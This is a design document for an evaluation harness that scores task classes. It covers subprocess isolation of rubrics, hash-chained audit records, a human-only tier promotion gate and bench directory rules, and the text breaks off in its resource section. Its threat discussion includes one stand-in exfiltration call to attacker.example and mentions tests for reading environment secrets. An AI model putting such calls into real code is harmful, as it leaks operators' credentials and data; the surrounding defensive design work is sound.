Phase 6.5 — Per-task-class eval harness + first benches: Final design¶
Status: Design of record (synthesized from three competing designs + critique).
Synthesized by: Graph-of-Thought synthesizer subagent
Date: 2026-05-12
Sources: design-performance.md · design-security.md · design-best-practices.md · critique.md
Lens summary¶
The synthesis is best-practices-shaped on the public surface, security-shaped on the load-bearing trust boundaries, and performance-shaped only where it can be added later without breaking the audit chain. The single non-reversible decision — rubric isolation — goes to the security lens: the rubric runs in a per-case subprocess (not the harness's Python process), with stdin/stdout JSON I/O and a hard wall-clock cap. We do not ship Firecracker/gVisor in Phase 6.5 (the critic correctly flagged the macOS/CI runner-substrate problem); we ship a subprocess.run rubric runner with env={}, cwd=tmpfs-scratch, and a documented RubricRunner Protocol so a future ADR can swap subprocess for microVM without touching BenchScore shape or the audit chain. Cache, parallelism, Sigstore anchors, and per-case microVMs are all deferred — the critic's strongest argument is that the evidence shape must be right now (because retrofitting changes the score), and everything else is layerable.
The runner is serial in Phase 6.5 (best-practices + security), with a single registered seam (RubricRunner Protocol; concurrency parameter on run_eval defaulting to 1) so the performance lens can land an asyncio.Semaphore pool in Phase 7+ without re-shaping anything. Audit records are chain-linked Phase-0-shaped JSON files (best-practices' Phase-0 reuse + security's prev_hash chain), but Sigstore anchors and operator-fingerprint signing are deferred — the critic correctly identified them as paying every-night costs to detect a threat (A3) that already requires shell on the operator. Promotion stays read-only verdict + hand-edited PR against bench/{tc}/registration.py#current_tier (security's TB-6 shape, slightly amended — tier state lives next to the bench, not in a separate docs/trust-tiers.yaml, because the latter creates a cross-bench central edit Phase 7 cannot make under its no-edits-to-existing-code invariant).
Goals (concrete, measurable)¶
| # | Goal | Source |
|---|---|---|
| G1 | src/codegenie/eval/ package exports ≤ 8 public names; mypy --strict clean; ruff C901 complexity ≤ 8/function. |
[B] |
| G2 | BenchScore is frozen=True, extra="forbid"; score ∈ [0, 1] validated; static-introspection test rejects field names matching confidence | llm | self_reported | model_says. |
[B+S] (mirrors Phase 5 ADR-0014) |
| G3 | Rubric runs in an isolated subprocess (subprocess.run, env={}, cwd=<tmpfs scratch>, hard wall-clock cap, JSON stdin/stdout). The rubric is never imported into the harness Python process. |
[S] (modulated — subprocess, not microVM, in Phase 6.5) |
| G4 | Promotion is read-only: PromotionGate.evaluate(...) → PromotionVerdict is a pure function; no code path mutates a tier. Tier change is a hand-edited PR against bench/{tc}/registration.py#current_tier reviewed by CODEOWNERS. |
[B+S] |
| G5 | Audit records are JSON files at .codegenie/eval/runs/<utc-iso>-<short>.json (mode 0600, atomic write via os.replace); each record carries prev_hash linking to the previous run for the same task class; codegenie eval verify re-walks the chain. |
[S] (chain) + [B] (Phase-0 RunRecord shape) |
| G6 | Fence-CI gate: a task class registered via @register_task_class("foo") without bench/foo/{cases,rubric.py,registration.py,README.md} and ≥ min_cases_for_promotion[bronze] cases fails CI with a specific diagnostic naming the missing path. AST-walk plus a literal-decorator-name lint rule (rejects aliased imports of register_task_class inside bench/*/registration.py). |
[B+S] (closes critic's alias-dodge) |
| G7 | codegenie eval run --task-class=vuln-remediation exits 0 against the backfilled bench; emits per-case JSONL to stdout + a single aggregate; writes the audit record. CI runs cassettes only (Phase 4 discipline); no live LLM calls in CI. |
[P+B+S] (all three agree) |
| G8 | BenchScore.cost_usd is mandatory and aggregated into BenchRunReport.total_cost_usd. Operator live runs accept --max-cost-usd (default $5.00) and abort on exceed. Concurrent live runs use a flock-based per-task-class lock so the cost cap holds across processes. |
[P] + critic's concurrent-cost-leak fix |
| G9 | Net-new runtime dependencies in [project].dependencies: 0. Pydantic v2, click, structlog, pyyaml already pinned; blake3 is added to [project.optional-dependencies].eval only (BLAKE3 chain hashing matches Phase 0; eval is opt-in install). |
[B] modulated — hashing matches Phase 0 (critic flagged the SHA-256 vs BLAKE3 divergence) |
| G10 | Total LOC for src/codegenie/eval/ excluding docstrings + tests: ≤ 700 LOC (modest bump over [B]'s 600 to absorb the subprocess rubric runner + chain hashing). |
[B] modulated |
| G11 | Cache layer: deferred to Phase 7+ (or Phase 13) with a documented seam in RubricRunner and run_eval so it can land without changing BenchScore or audit shape. Phase 6.5 ships no cache. |
[synth] (resolves the critic's hardest attack on [P]) |
| G12 | Parallelism: deferred to Phase 7+ with a concurrency: int = 1 parameter on run_eval and a RubricRunner that is process-isolation-safe. Phase 6.5 runs serial. |
[synth] (resolves critic's "serial is asserted, not argued" by accepting [B+S] for now and naming the upgrade path) |
| G13 | Sigstore anchors + operator-fingerprint signing: deferred to Phase 16 production hardening (tracked as a new ADR slot). Phase 6.5's chain detects local tamper; Phase 16's anchors detect host-compromise. | [synth] (resolves critic's L6 cost/benefit attack on [S]) |
Architecture¶
src/codegenie/eval/
├── __init__.py # public surface (≤ 8 re-exports)
├── models.py # Pydantic v2: BenchCase, BenchScore, BenchRunReport,
│ # PromotionVerdict, EvalRunRecord (the chained audit entry)
├── registry.py # @register_task_class + TaskClassRegistry + default_registry
│ # (mirrors @register_probe shape exactly — [B])
├── rubric.py # Rubric Protocol (runtime_checkable) + RubricRunner Protocol
│ # (the seam for subprocess-now / microVM-later)
├── rubric_runner.py # SubprocessRubricRunner: spawns python -c "<rubric>"
│ # with env={}, cwd=tmpfs-scratch, JSON stdin/stdout,
│ # hard wall-clock cap. Strategy-pattern with a stub
│ # InProcessRubricRunner for tests only (gated by env var,
│ # never used in CI or by `codegenie eval run`).
├── loader.py # bench/{tc}/cases/ → tuple[BenchCase, ...];
│ # imports bench/{tc}/registration.py via real package path
│ # (sys.path prepend on bench/, not synthesized name —
│ # closes critic's importlib hand-wave)
├── runner.py # run_eval(...) → BenchRunReport; SERIAL by default;
│ # concurrency parameter is the seam for Phase 7+;
│ # SUT invocation is async-aware (asyncio.run wrapping
│ # documented and tested — closes critic's SIGALRM problem
│ # by using asyncio.wait_for, not signal.SIGALRM)
├── promotion.py # PromotionGate.evaluate(...) → PromotionVerdict; PURE
│ # function. Reads `current_tier` from the registration
│ # (TaskClass.current_tier), not from a central YAML.
├── audit.py # write_run_record(report, out_dir) → Path;
│ # chain-walks prior records for prev_hash;
│ # codegenie eval verify command re-walks the chain.
├── errors.py # EvalError hierarchy under CodegenieError
└── cli.py # `codegenie eval run` + `codegenie eval verify`
# + `codegenie eval promote-verdict` subcommands.
bench/ # contract territory (CODEOWNERS-gated)
├── README.md # the bench/ contract itself
├── vuln-remediation/
│ ├── registration.py # @register_task_class("vuln-remediation",
│ │ # current_tier="bronze",
│ │ # min_cases_for_promotion={"silver": 10, "gold": 30, ...})
│ ├── rubric.py # one class implementing Rubric (run via SubprocessRubricRunner)
│ ├── README.md # what this bench measures + how to add cases
│ └── cases/
│ └── {case-id}/
│ ├── case.toml # provenance, disposition, difficulty
│ ├── input/ # frozen repo snapshot OR input-pointer.toml
│ └── expected/ # ground-truth diff + expected CVE delta
├── migration-chainguard-distroless/
│ ├── registration.py
│ ├── rubric.py
│ ├── README.md
│ └── cases/... # ≥3 seed cases; Phase 7 expands to ≥10
.codegenie/eval/runs/<utc-iso>-<short>.json # chained audit records
Why this shape.
- The package layout is [B]'s — every name a Phase 0/Phase 5 contributor recognizes.
- The RubricRunner strategy is the load-bearing departure: it bakes the security boundary into the type system today and lets the implementation evolve from subprocess to microVM later via ADR + a one-class swap.
- Tier state lives on the registration (not in docs/trust-tiers.yaml) so adding a new task class in Phase 7 is genuinely "extension by addition" — the critic's roadmap-level point #1.
Components¶
src/codegenie/eval/registry.py — @register_task_class + TaskClassRegistry¶
- Provenance:
[B]with one[S]element (CODEOWNERS protection onbench/**/registration.py). - Purpose: Open registry; same shape as
@register_probeand@register_signal_kind. - Interface:
@register_task_class( "vuln-remediation", current_tier="bronze", min_cases_for_promotion={"silver": 10, "gold": 30, "platinum": 100}, ) class VulnRemediationRubric(Rubric): ...default_registry: TaskClassRegistry(module-level singleton);TaskClassRegistry()is constructable for tests;TaskClassAlreadyRegisteredraised on collision (mirrorsSignalKindAlreadyRegistered). - Internal design:
_task_classes: dict[str, TaskClass]. The decorator returns the class unchanged. - Why this choice over the alternatives:
[P]'simportlib.metadataentry-point lookup is rejected — it requires installing eachbench/{tc}/as a distribution, which (a) makes Phase 7 require apyproject.tomledit (violates extension-by-addition); (b) makes test isolation hard (entry points are global).[S]'stools/digests.yamlrubric pin is rejected for the same reason — central manifest edit on every rubric change blocks Phase 7's no-edits invariant.[B]'s direct decorator import wins. - Tradeoffs accepted: Module-level singleton requires test discipline (use a fresh
TaskClassRegistry()in unit tests). Same trade Phase 0 made.
src/codegenie/eval/models.py — Pydantic v2 models¶
- Provenance:
[B]shape,[S]field-name discipline,[P]cost field. - Purpose: All wire types for the eval domain.
- Interface:
BenchCase,BenchScore,BenchRunReport,PromotionVerdict,EvalRunRecord(chained audit entry),TaskClass(frozendataclasswithrubric_class: type[Rubric]).class BenchScore(BaseModel): model_config = ConfigDict(frozen=True, extra="forbid") passed: bool score: float = Field(ge=0.0, le=1.0) breakdown: dict[str, float] # flat — no nested dicts/lists in values failure_modes: tuple[str, ...] # tuple for immutability cost_usd: float = Field(ge=0.0) duration_seconds: float = Field(ge=0.0) # No `confidence`, `llm_*`, `self_reported_*`, `model_says_*` fields. # Enforced by tests/unit/test_bench_score_static.py (mirrors Phase 5 # ADR-0014's test_objective_signals_static.py). class EvalRunRecord(BaseModel): model_config = ConfigDict(frozen=True, extra="forbid") schema_version: Literal[1] task_class: str run_id: str # SHA-256 of (task_class || sorted_case_ids || score_jsons) report: BenchRunReport case_digest_set: dict[str, str] # case_id → BLAKE3 of case directory rubric_digest: str # BLAKE3 of rubric.py cassette_digest_set: dict[str, str | None] # case_id → BLAKE3 of cassette file harness_version: str started_at: datetime finished_at: datetime prev_hash: str # SHA-256 of previous record's bytes; "0"*64 at genesis - Internal design:
extra="forbid", frozen=Trueeverywhere.BenchScore.breakdownisdict[str, float](no nested values) — same anti-smuggle pattern as Phase 5 ADR-0014'sObjectiveSignals.extra.failure_modesistuplenotlistso the type system rejects mutation. - Why this choice over the alternatives:
[P]'sBenchScorecollapsedprovenanceandcase_idintoBenchScore; we keep them onBenchCase/EvalRunRecordto keepBenchScorepurely "the rubric's facts about one case" (CLAUDE.md "Facts not judgments").[S]'sBenchRunRecordbecomes ourEvalRunRecordwith the sameprev_hashchain but without Sigstoreoperator_fingerprintandmicrovm_image_digest(deferred per G13). - Tradeoffs accepted: Banned-substring static check is necessary but not sufficient (critic correctly flagged
evidence_strengthcould smuggle confidence). The structural defense isextra="forbid"+ the per-rubric review; the substring check is an early warning, not the whole defense. Documented in the test's docstring.
src/codegenie/eval/rubric.py + rubric_runner.py — Rubric Protocol + RubricRunner strategy¶
- Provenance:
[B]Protocol shape;[S]isolation discipline;[synth]subprocess-now-microVM-later split. - Purpose: The contract every task class implements + the harness-side execution boundary.
- Interface:
@runtime_checkable class Rubric(Protocol): """Stateless. One method. Implementations live in bench/{tc}/rubric.py.""" def score(self, case: BenchCase, harness_output: Mapping[str, Any]) -> BenchScore: ... class RubricRunner(Protocol): """The execution boundary. Strategy pattern: SubprocessRubricRunner now, future MicroVMRubricRunner under ADR amendment.""" async def run( self, rubric_path: Path, case: BenchCase, harness_output: Mapping[str, Any], *, wall_clock_cap_seconds: float, ) -> BenchScore: ... class SubprocessRubricRunner: """Default. Spawns `python -I -B <rubric_runner_entrypoint> < inputs.json > output.json` with env={}, cwd=<tmpfs scratch dir>, no inherited file descriptors, hard wall-clock cap via asyncio.wait_for(asyncio.create_subprocess_exec(...).wait(), timeout=...). JSON stdin/stdout — the rubric never shares memory with the harness. The runner copies bench/{tc}/rubric.py bytes into the scratch dir before spawn (no import). """ - Internal design:
SubprocessRubricRunnerusesasyncio.create_subprocess_execwithenv={},cwd=<scratch>,stdin=PIPE,stdout=PIPE,stderr=PIPE. Inputs serialized as JSON ({case: <BenchCase.model_dump>, harness_output: ...}) into stdin. Output read from stdout, parsed viaBenchScore.model_validate_json(catchesextra="forbid"violations + range errors). On timeout:proc.kill(), returnBenchScore(passed=False, failure_modes=("rubric_timeout",), score=0.0, ...). On non-zero exit or malformed output:BenchScore(passed=False, failure_modes=("rubric_malformed",), ...). The rubric.pyfile is copied into scratch (not imported); the subprocess runspython /scratch/rubric_entrypoint.pywhere the entrypoint loads/scratch/rubric.pyand dispatches. - Why this choice over the alternatives:
[P]and[B]import the rubric in-process — critic correctly identifies this as RCE-on-operator-host.[S]mandates Firecracker microVM — critic correctly identifies that GitHub-hosted CI runners can't run nested-virt without explicit config, and that gVisor-on-Lima is a second sandbox stack on top of Phase 5's DinD. Subprocess withenv={}andcwd=<tmpfs>is the load-bearing 80% of microVM isolation at 5% of the cost. It blocks env-var read, restricts FS to scratch, breaks shared memory, and runs anywhere Python runs. It does not block network egress or/etc/passwdread — those are addressed by a future ADR-amend that swapsSubprocessRubricRunnerforMicroVMRubricRunnerin Phase 16. Crucially, theBenchScoreshape is identical either way, so swapping runners does not invalidate prior audit records (the critic's strongest argument for getting rubric isolation right now). - Tradeoffs accepted: Subprocess does not block network egress in Phase 6.5. A malicious rubric merged through CODEOWNERS can
urllib.request.urlopen("http://attacker.example"). We accept this on the grounds that (a) CODEOWNERS + two-reviewer rule (G3 + the new invariant onbench/**/rubric.py) is the L1 defense; (b) the production sandbox in Phase 5 already establishes the network-egress-blocking pattern that Phase 16 will inherit; (c) shipping subprocess now preserves the audit-chain comparability that microVM-from-day-one would have required Firecracker on an unsupported substrate. We document atests/adversarial/test_rubric_isolation.pythat assertsos.environ.get("ANTHROPIC_API_KEY")returnsNoneand thatPath("/scratch/").iterdir()shows only the expected files; the network-egress test isxfailwith a pointer to the future ADR.
src/codegenie/eval/loader.py — bench-directory loader¶
- Provenance:
[B]core,[synth]import-path fix. - Purpose: Load
bench/{tc}/cases/*/case.tomlintotuple[BenchCase, ...]; triggerbench/{tc}/registration.pyimport for decorator side-effect. - Interface:
load_task_class(name, bench_root=Path("bench")) -> TaskClass;load_cases(task_class) -> tuple[BenchCase, ...]. - Internal design: Prepends
bench_root.resolve()tosys.pathexactly once (under a_bench_path_addedmodule guard), thenimportlib.import_module(f"{name.replace('-', '_')}.registration")— same shape as Phase 0'scodegenie.probes.{name}import but with the bench root explicitly onsys.path. The_codegenie_benchsynthesized prefix from[B]is rejected (critic correctly identified it as not actually working).case.tomlparsed with stdlibtomllib. Sorted bycase_idfor determinism. - Why this choice over the alternatives:
[P]'simportlib.metadata.entry_pointsrequires distribution install;[B]'s synthesized prefix doesn't resolve.sys.pathprepend is the simplest approach that actually works and matches Phase 0's mental model. - Tradeoffs accepted: Mutating
sys.pathis global state. We do it once, idempotently, and document it. Tests that need isolation use a freshTaskClassRegistry()and passbench_rootexplicitly.
src/codegenie/eval/runner.py — run_eval¶
- Provenance:
[B]shape,[synth]async correctness,[P]concurrency seam (deferred wire-up). - Purpose: End-to-end execution for one task class.
- Interface:
async def run_eval( task_class_name: str, *, case_filter: Callable[[BenchCase], bool] | None = None, system_under_test: Callable[[BenchCase], Awaitable[Mapping[str, Any]]], rubric_runner: RubricRunner | None = None, # default: SubprocessRubricRunner timeout_per_case_seconds: float = 600.0, concurrency: int = 1, # ≥1; Phase 6.5 ships 1 max_cost_usd: float = 5.0, out_dir: Path = Path(".codegenie/eval/runs"), bench_root: Path = Path("bench"), ) -> BenchRunReport: ... - Internal design:
async def; the harness is async-shaped from Phase 6.5 because Phase 6's SUT isasync(LangGraphainvoke). Per-case timeout viaasyncio.wait_for(system_under_test(case), timeout=timeout_per_case_seconds)— notsignal.SIGALRM(critic correctly flagged the SIGALRM-vs-asyncio incompatibility in[B]). Per-casetry/except Exceptionisolates failures:BenchScore(passed=False, failure_modes=(f"harness_error: {type(e).__name__}",), score=0.0, cost_usd=0.0, ...). Concurrency:asyncio.Semaphore(concurrency); withconcurrency=1the semaphore is a no-op (serial). Cost cap: rolling sum ofBenchScore.cost_usd; on exceed, cancel outstanding tasks (task.cancel()), setBenchRunReport.aborted=True, exit non-zero. Concurrent-process cost-cap protection: acquire aflockon<bench_root>/.<task_class>.runlockfor live runs (max_cost_usd > 0and not in cassette mode); CI runs (cassettes only) skip the lock. - Why this choice over the alternatives:
[B]'s synchronous loop withsignal.SIGALRMdoes not compose with Phase 6's async SUT.[P]'s aggressive parallelism + content-addressed cache extracts wall-clock at the cost of asut_digeststrategy the critic correctly demolished.[S]'s strict-serial is the right Phase 6.5 default but its "concurrency is an integrity-correlation risk" is rhetorical, not argued. We ship serial in Phase 6.5 with a documented concurrency parameter, accepting[B+S]'s wall-clock cost in exchange for shipping the right concurrency boundary that future phases extend without re-shaping. - Tradeoffs accepted: No cache in Phase 6.5 (G11). Nightly serial run cost is the cost of correctness-before-speed at this surface size. The
RubricRunnerProtocol +concurrencyparameter are the seams for Phase 7+ to layer on cache + parallelism without breaking the audit chain.
src/codegenie/eval/promotion.py — PromotionGate¶
- Provenance:
[B]pure-function shape,[S]apply-blocking discipline,[synth]tier-on-registration location. - Purpose: Compute a
PromotionVerdictfrom aBenchRunReport+ the registration's tier config. - Interface:
Verdict carries
class PromotionGate: def evaluate( self, task_class: TaskClass, report: BenchRunReport, target_tier: Literal["silver", "gold", "platinum"], tier_thresholds: Mapping[str, float], # passed in; loaded from registration ) -> PromotionVerdict: ... def apply(self, *args, **kwargs) -> NoReturn: raise PromotionMustBeHumanAuthorized( "Tier promotion is a hand-edited PR against " "bench/{task_class}/registration.py#current_tier." )current_tier(read fromtask_class.current_tier),target_tier,evidence_sufficient: bool,reasons: tuple[str, ...](every failed condition listed individually, not just the first). - Internal design: Pure function; no I/O writes outside an optional
.codegenie/eval/recommendations/<utc-iso>.jsonaudit-trail file (informational only).evidence_sufficient = Trueiffreport.mean_score ≥ tier_thresholds[target_tier]ANDreport.passed_count ≥ task_class.min_cases_for_promotion[target_tier]ANDreport.block_severity_failure_modes == (). - Why this choice over the alternatives:
[B]'sdocs/trust-tiers.yamlcentral tier file would force Phase 7 to editdocs/trust-tiers.yaml— violating Phase 7's "no edits to existing code" exit criterion.[S]'s tier-on-registration is correct; we adopt it.[S]'sapply()raising unconditionally is a strong "fail-loud" signal — we keep it. - Tradeoffs accepted: Tier state coupling:
current_tierlives in code (registration.py). A tier promotion is a one-line code change reviewed via the standard PR flow. This is the same mechanism CODEOWNERS already governs; adding a separate YAML store would be ceremony without payoff.
src/codegenie/eval/audit.py — chained audit-record writer¶
- Provenance:
[B]Phase-0 RunRecord shape,[S]chain hashing (without Sigstore anchors). - Purpose: Atomically write
EvalRunRecordto.codegenie/eval/runs/<utc-iso>-<short>.json; chain-walk on read. - Interface:
write_run_record(record: EvalRunRecord, out_dir: Path) -> Path— computesprev_hashfrom the most recent record for the same task class; writes mode 0600 atomically viaos.replace.verify(task_class: str, since: datetime | None = None) -> VerifyResult— re-walks chain entries; reports gaps and tampered records.- No
publish_anchor— Sigstore + GPG are deferred per G13. - Internal design:
prev_hash = sha256(read_bytes(prior_record_path))for the most recent prior record bystarted_atfor the sametask_class. Genesis:"0" * 64. BLAKE3 (viablake3PyPI dep in[project.optional-dependencies].eval) for content hashing of cases/rubric/cassettes — matches Phase 0'scodegenie/hashing.py(G9; closes the critic's SHA-256-vs-BLAKE3 divergence in[B]). The audit-chain identity hash is SHA-256 over the record bytes (matches Phase 0's identity-tuple convention; the chain head is verifiable without BLAKE3 ifevalextras aren't installed). - Why this choice over the alternatives:
[P]'s JSONL stream +runs.jsonlindex has no chain — once tampered, undetectable.[S]'s full Sigstore pipeline pays an every-night cost for a defense layer (L6) whose threat model assumes shell on the operator. We ship the chain (cheap, valuable) and defer Sigstore + GPG anchors to a future phase ADR. The chain alone catches every mid-stream tamper; Sigstore catches post-pull-divergence, which is a Phase 16 concern. - Tradeoffs accepted: Without Sigstore anchors, an attacker with shell on the operator can rewrite
.codegenie/eval/runs/end-to-end (recompute everyprev_hash) and the local chain re-verifies. We accept this because (a) the threat already requires shell-on-operator, (b) the published audit anchor in git history can be added as a trivial follow-on PR (audit/anchors/eval/<date>.jsonwith the chain head, no Sigstore), and (c) doing it now would either require Sigstore (paying the operational debt the critic correctly flagged) or operator GPG keys (unrealistic). Documented as a known gap.
src/codegenie/eval/cli.py — codegenie eval subcommands¶
- Provenance:
[B]click structure;[P]JSONL-to-stdout discipline;[S]verifysubcommand. - Purpose: Operator + CI surface.
- Interface:
codegenie eval run --task-class=<name> [--cases=<glob>] [--concurrency=<int>] [--max-cost-usd=<float>] [--out=<path>] [--bench-root=<path>]codegenie eval verify --task-class=<name> [--since=<iso>]codegenie eval promote-verdict --task-class=<name> --target-tier=<tier>- Internal design: Heavy imports deferred per Phase 0 import-linter contract. Stdout is JSONL by default (one
BenchScoreper line, then one aggregate line, then the promotion verdict ifpromote-verdict); structlog logs to stderr. Exit codes: 0 on success; 1 on harness error; 2 on cost-cap exceeded; 3 onTaskClassNotFound; 4 onbench/{name}/cases/empty. - Tradeoffs accepted: No
--watch, no progress bar.tqdm-free; this is a CI-first tool.
bench/{task-class-slug}/ directory contract¶
- Provenance:
[B]layout,[S]provenance metadata + CODEOWNERS,[synth]nocases/digests.yamlcentral pin. - Structure (enforced by fence-CI):
bench/{slug}/ ├── registration.py # exactly one @register_task_class("{slug}") call; │ # current_tier="bronze" at first register ├── rubric.py # one class implementing Rubric Protocol ├── README.md # what this bench measures + how to add cases └── cases/ └── {case-id}/ ├── case.toml ├── input/ # frozen snapshot OR input-pointer.toml ├── expected/ └── cassette.yaml # optional; Phase 4 cassette pathcase.tomlschema:case_id,task_class,disposition(positive/negative/ambiguous),difficulty,source(curated/outcome-ledger-derived/regression-converted),commit_sha(required iffsource != "curated"),added_at,last_validated_at, optionalcassette_path, optionalcassette_blake3(the per-case integrity pin from[S]'s TB-8 — Phase 6.5 makes it advisory; Phase 7+ may make it strict). - Why this choice over the alternatives:
[S]'scases/digests.yamlcentral digest pin is rejected — it forces a central edit on every case add, plus the critic correctly identified that "one mismatch → abort" turns one bad case into nuking the whole night's run. We move integrity pins to per-case (cassette_blake3incase.toml) and keep them advisory in 6.5 (warn-not-abort) so a single curation typo doesn't block all promotion evidence. CODEOWNERS protection onbench/**handles the "soften the corpus" threat at the L1 layer. - Tradeoffs accepted: Bench cases live in this repo (all three lenses agreed; ADR-0016 §Open Q4 defers the split). When migration cases start including customer Dockerfiles, a sibling
codewizard-sherpa-benchesrepo becomes the right move — flagged as an open question for Phase 7's exit review.
Fence-CI test extension¶
- Provenance:
[B]AST walk,[S]literal-decorator lint,[synth]alias-dodge fix. - Purpose: A task class registered via
@register_task_class("foo")withoutbench/foo/{cases,rubric.py,registration.py,README.md}and ≥10 cases fails CI with a specific diagnostic. - Internal design: Two-stage. Stage 1: AST-walk every
bench/*/registration.py, find calls toregister_task_class(name-or-attribute matching, acceptingregister_task_class(...),eval_registry.register_task_class(...), etc.) with a string-literal first argument. Reject non-literal first args with a specific error (closes critic's literal-name hole). Stage 2: For each registered name, assert directory contract + ≥min_cases_for_promotion["bronze"]cases (default 10). The matcher does not trigger on aliased imports (from codegenie.eval import register_task_class as rtc) because we require the literal symbol nameregister_task_classin the decorator position — closes critic's alias-dodge with a one-line lint rule documented inbench/README.md. - Wall-clock budget: ≤ 2s for the whole fence test (
[P]'s budget; the AST-only check makes it cheap).
Data flow¶
End-to-end codegenie eval run --task-class=vuln-remediation:
- CLI parse + lazy import.
clickparses;runner.run_evalandloader.load_task_classimported on demand. Phase 6's concrete graph builder is not imported here — the CLI receives an injectedVulnRemediationSut. - Loader.
load_task_class("vuln-remediation")prependsbench/.resolve()tosys.pathonce, thenimportlib.import_module("vuln_remediation.registration"). Decorator fires →default_registry.register(TaskClass(...))→TaskClassAlreadyRegisteredon collision (loud crash).load_cases(task_class)walkscases/*/case.toml, parses withtomllib, validates viaBenchCasePydantic model. Sorted bycase_id. - Runner.
run_eval(...)async; instantiatesSubprocessRubricRunner. For each case, in serial (concurrency=1): harness_output = await asyncio.wait_for(system_under_test.run_case(case), timeout=600.0)— Phase 6's stableVulnRemediationSutcontract with cassette replay; onTimeoutErrororException→BenchScore(passed=False, failure_modes=("timeout",) or ("harness_error: ...",)).score = await rubric_runner.run(rubric_path, case, harness_output, wall_clock_cap_seconds=60.0)— subprocess spawn withenv={}, cwd=<tmpfs scratch>; JSON I/O; Pydantic validates output (extra="forbid"+score ∈ [0,1]).cost_total += score.cost_usd; ifcost_total > max_cost_usd, cancel outstanding tasks, markBenchRunReport.aborted = True, exit code 2.- Score logged as one JSONL line to stdout via structlog.
- Aggregate.
mean_score,passed_count,total_cost_usd,block_severity_failure_modes(union across cases). Computerun_id = sha256(task_class || sorted_case_ids || score_jsons)(deterministic — two engineers running the same SUT + cassettes get the samerun_id). - Audit.
audit.write_run_record(EvalRunRecord(report, prev_hash=..., case_digest_set=..., rubric_digest=..., cassette_digest_set=..., harness_version=..., started_at, finished_at), out_dir=.codegenie/eval/runs/). Atomic write viaos.replace(tmp, final). Mode 0600.prev_hashderived from the most recent prior record for this task class. - Promotion verdict (optional, via separate subcommand).
promote-verdict --target-tier=silverreads the latestEvalRunRecordfor the task class, verifies the chain viaaudit.verify, callsPromotionGate.evaluate(...), prints the verdict as JSON. Does not modify any tier. - Exit. Code 0 if every case passed AND no
block-severity failure mode AND not aborted; otherwise non-zero.
Trust boundary crossings (per security lens):
- TB-1 (curator → bench/): CODEOWNERS-protected branch. [Phase 6.5]
- TB-2 (rubric.py source → rubric executor): SubprocessRubricRunner boundary; JSON I/O over pipe; env={}; cwd=<scratch>. [Phase 6.5]
- TB-3 (rubric subprocess → harness): Pydantic schema validation on JSON output; range checks; wall-clock + RSS caps enforced by harness. [Phase 6.5]
- TB-4 (harness → audit): chained EvalRunRecord writes; codegenie eval verify re-walks. [Phase 6.5]
- TB-5 (audit → promotion gate): gate refuses to read on chain-tamper detection. [Phase 6.5]
- TB-6 (promotion gate → tier change): apply() always raises; tier change is a hand-edited PR. [Phase 6.5]
- TB-7 (outcome ledger → regression-converted cases): contract for Phase 13; Phase 6.5 defines BenchCase.source = "regression-converted" shape but doesn't ship the conversion path. [Phase 13]
- TB-8 (cassette → bench runner): cassette_blake3 per case; advisory in 6.5; strict in 7+. [Phase 7+]
- TB-9 (chain → published anchor): Sigstore/GPG anchors deferred to Phase 16. [Phase 16]
Failure modes & recovery¶
| Failure | Detected by | Containment | Recovery | Source |
|---|---|---|---|---|
Duplicate @register_task_class("foo") |
TaskClassRegistry.register at import time |
TaskClassAlreadyRegistered raised loudly with both qualnames |
Rename one; PR cannot land | [B] |
case.toml malformed |
BenchCase Pydantic validation in loader.load_cases |
BenchCaseLoadError with case directory + failing field; the failing case is excluded; other cases continue; aggregate marked had_load_errors=True; exit code 1 |
Fix case.toml; re-run |
[B] modulated — exclude-and-continue is the intentional containment so one bad case doesn't nuke the night (closes critic's [S] "one mismatch → abort" attack); the run still exits non-zero (CLAUDE.md "Fail loud") |
| SUT raises during one case | Per-case try/except Exception in run_eval |
BenchScore(passed=False, failure_modes=("harness_error: <Type>: <msg>",), score=0.0, cost_usd=0.0); other cases continue |
Investigate the SUT failure; the case becomes a regression test | [B+P] |
SUT exceeds timeout_per_case_seconds |
asyncio.wait_for TimeoutError |
BenchScore(passed=False, failure_modes=("timeout",), ...); other cases continue |
Widen the timeout if legitimate; otherwise treat as a real failure | [synth] (asyncio.wait_for, not SIGALRM — closes critic's [B] SIGALRM problem) |
Rubric subprocess returns non-JSON or malformed BenchScore |
Subprocess stdout parse + Pydantic validation | BenchScore(passed=False, failure_modes=("rubric_malformed: <detail>",), ...); other cases continue |
Investigate the rubric; CI runs rubric unit tests as a separate gate | [S] modulated |
| Rubric subprocess exceeds wall-clock cap | asyncio.wait_for on the subprocess |
proc.kill(); BenchScore(passed=False, failure_modes=("rubric_timeout",), ...); other cases continue |
Investigate rubric performance; raise cap if legitimate | [S] |
| Rubric attempts env-var read | Subprocess env={} |
os.environ.get("ANTHROPIC_API_KEY") returns None; rubric continues but produces a wrong score |
Adversarial test (tests/adversarial/test_rubric_env_read.py) catches at PR time |
[S] modulated (subprocess, not microVM) |
| Rubric attempts network egress | Not blocked in Phase 6.5; documented gap | An attacker with merged-rubric access can exfiltrate (CODEOWNERS is the L1 defense) | Phase 16 ADR introduces MicroVMRubricRunner; BenchScore shape unchanged so audit chain remains comparable |
[synth] (deferred per G13) |
| Cost cap exceeded mid-run | Aggregator after each BenchScore |
Cancel outstanding tasks; BenchRunReport.aborted=True; exit code 2 |
Cached scores stand for completed cases | [P] |
| Concurrent live runs racing on cost cap | flock on <bench_root>/.<task_class>.runlock for live runs |
Second invocation blocks until first releases | Operator runs serially; CI cassette runs skip the lock | [synth] (closes critic's [P] concurrent-cost-leak attack) |
| Audit chain tampered | audit.verify re-walks chain on promote-verdict |
ChainTamperDetected raised; promotion gate refuses to read |
Investigate (likely operator host compromise); restore from a prior commit's audit dir | [S] modulated |
bench/{name}/registration.py missing @register_task_class literal |
Fence-CI AST walk (Stage 1) | CI fail with named diagnostic; PR blocked | Add the decorator with a literal name | [B+S] |
New task class registered without bench/{name}/cases/ ≥ 10 cases |
Fence-CI dir-walk (Stage 2) | CI fail naming the missing path | Land cases (or land the registration in the same PR with cases) | [B] |
BenchScore smuggles a banned field name |
Static-introspection test + extra="forbid" runtime |
CI fail before merge | Rename the field; the substring check is an early warning, not the whole defense | [B+S] |
promotion.apply() called from code |
PromotionMustBeHumanAuthorized raised unconditionally |
Loud failure with stack trace | Tier change must be a hand-edited PR | [S] |
Resource & cost profile¶
- Wall-clock for nightly
